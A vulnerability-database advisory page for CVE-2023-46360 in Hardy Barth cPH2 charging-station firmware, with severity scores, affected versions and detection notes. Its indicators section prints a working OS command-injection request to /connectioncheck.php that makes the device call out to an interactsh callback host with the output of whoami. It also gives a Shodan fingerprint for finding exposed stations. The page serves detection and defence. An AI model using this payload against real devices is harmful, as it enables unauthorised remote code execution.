cbcvebase.
CVE-2023-46360
published 2024-02-06

CVE-2023-46360: Hardy Barth cPH2 eCharge Ladestation v1.87.0 and earlier is vulnerable to Execution with Unnecessary Privileges.

PriorityP259high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
2.83%
84.9th percentile
Hardy Barth cPH2 eCharge Ladestation v1.87.0 and earlier is vulnerable to Execution with Unnecessary Privileges.

Affected

1 ranges
VendorProductVersion rangeFixed in
hardy-barthcph2_echarge_firmware<= 1.87.0

Detection & IOCsextracted from sources · hover to see the quote

url/connectioncheck.php?ip={{url_encode('127.0.0.1 && curl http://$(whoami).{{interactsh-url}}')}}
path/connectioncheck.php
command127.0.0.1 && curl http://$(whoami).{{interactsh-url}}
  • Shodan query to identify exposed Hardy Barth cPH2 charging stations: search for HTML containing 'Salia PLCC'
  • Successful exploitation of the connectivity check endpoint returns the string 'SUCCESS' in the HTTP response body, along with the injected payload reflected back
  • Out-of-band DNS callback via interactsh confirms RCE; monitor for DNS queries containing the output of 'whoami' as a subdomain, originating from the target device
  • The vulnerability is exploited via a GET request to /connectioncheck.php with a crafted 'ip' parameter containing OS command injection payloads (e.g., shell metacharacters like &&)
  • ·CVE-2023-46360 is described as 'Execution with Unnecessary Privileges' (CWE-250/privilege-related), which is distinct from the OS command injection (CWE-78) described in the template for CVE-2023-46359. The two CVEs may require different detection approaches.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.